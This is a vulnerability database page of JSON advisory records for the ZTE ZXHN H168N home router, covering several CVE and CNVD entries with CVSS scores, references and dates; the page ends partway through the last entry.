    A ZTE product is impacted by improper access control vulnerability. The attacker could exploit this vulnerability to access CLI by brute force attacks.This affects: ZXHN H168N V3.5.0_TY.T6

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0778",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zte",
            "version": "3.5.0_ty.t6"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "cve": "CVE-2021-21730",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-21730",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-21730",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-21730",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-922",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-21730",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21730"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A ZTE product is impacted by improper access control vulnerability. The attacker could exploit this vulnerability to access CLI by brute force attacks.This affects: ZXHN H168N V3.5.0_TY.T6",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-21730"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-21730"
          }
        ],
        "trust": 0.99
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "ZTE",
            "id": "1014864",
            "trust": 1.7
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21730",
            "trust": 1.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-21730",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21730"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "id": "VAR-202104-0778",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.37662336
      },
      "last_update_date": "2024-11-23T22:11:00.766000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1014864"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21730"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/863.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21730"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21730"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-21730"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          },
          {
            "date": "2021-04-13T16:15:12.450000",
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-22T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-21730"
          },
          {
            "date": "2022-07-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          },
          {
            "date": "2024-11-21T05:48:53.793000",
            "db": "NVD",
            "id": "CVE-2021-21730"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE ZXHN H168N Security hole",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-922"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202106-0821

    Vulnerability from variot - Updated: 2024-08-14 13:43

    A ZTE product has an information leak vulnerability. Due to improper permission settings, an attacker with ordinary user permissions could exploit this vulnerability to obtain some sensitive user information through the wizard page without authentication. This affects ZXHN H168N all versions up to V3.5.0_EG1T4_TE. ZXHN H168N There is a vulnerability in improper retention of permissions.Information may be obtained

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202106-0821",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zxhn h168n",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zte",
            "version": "3.5.0_eg1t4_te"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "zte",
            "version": "zxhn h168n  firmware  3.5.0_eg1t4_te  until"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "cve": "CVE-2021-21735",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-21735",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-21735",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.5,
                "baseSeverity": "Medium",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-21735",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-21735",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-21735",
                "trust": 0.8,
                "value": "Medium"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A ZTE product has an information leak vulnerability. Due to improper permission settings, an attacker with ordinary user permissions could exploit this vulnerability to obtain some sensitive user information through the wizard page without authentication. This affects ZXHN H168N all versions up to V3.5.0_EG1T4_TE. ZXHN H168N There is a vulnerability in improper retention of permissions.Information may be obtained",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-21735"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          }
        ],
        "trust": 1.62
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-21735",
            "trust": 3.2
          },
          {
            "db": "ZTE",
            "id": "1015924",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202106-790",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202106-790"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "id": "VAR-202106-0821",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.37662336
      },
      "last_update_date": "2024-08-14T13:43:31.821000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Information\u00a0Leak\u00a0Vulnerability\u00a0in\u00a0A\u00a0ZTE\u00a0Product",
            "trust": 0.8,
            "url": "https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1015924"
          },
          {
            "title": "ZTE ZXHN H168N Repair measures for information disclosure vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=153798"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202106-790"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-281",
            "trust": 1.0
          },
          {
            "problemtype": "Improper retention of permissions (CWE-281) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "https://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1015924"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21735"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202106-790"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202106-790"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "date": "2021-06-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202106-790"
          },
          {
            "date": "2021-06-10T12:15:08.457000",
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-28T05:49:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          },
          {
            "date": "2021-06-11T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202106-790"
          },
          {
            "date": "2021-06-17T18:56:27.863000",
            "db": "NVD",
            "id": "CVE-2021-21735"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZXHN\u00a0H168N\u00a0 Vulnerability regarding improper retention of permissions in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-007929"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202106-790"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-2029

    Vulnerability from variot - Updated: 2022-05-04 09:55

    ZTE Corporation is the world's leading provider of integrated communications solutions.

    ZTE Corporation ZXHN H168N has an unauthorized access vulnerability. Attackers can use the vulnerability to obtain sensitive information.

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-2029",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zxhn h168n",
            "scope": null,
            "trust": 0.6,
            "vendor": "zte",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ]
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2021-18273",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2021-18273",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE Corporation is the world\u0027s leading provider of integrated communications solutions.\n\r\n\r\nZTE Corporation ZXHN H168N has an unauthorized access vulnerability. Attackers can use the vulnerability to obtain sensitive information.",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ],
        "trust": 0.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ]
      },
      "id": "VAR-202104-2029",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ],
        "trust": 0.97662336
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ]
      },
      "last_update_date": "2022-05-04T09:55:13.700000Z",
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE Corporation ZXHN H168N has an unauthorized access vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18273"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-2028

    Vulnerability from variot - Updated: 2022-05-04 08:52

    ZTE Corporation is the world's leading provider of integrated communications solutions.

    ZTE Corporation ZXHN H168N has a command execution vulnerability. Attackers can use this vulnerability to execute arbitrary commands.

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
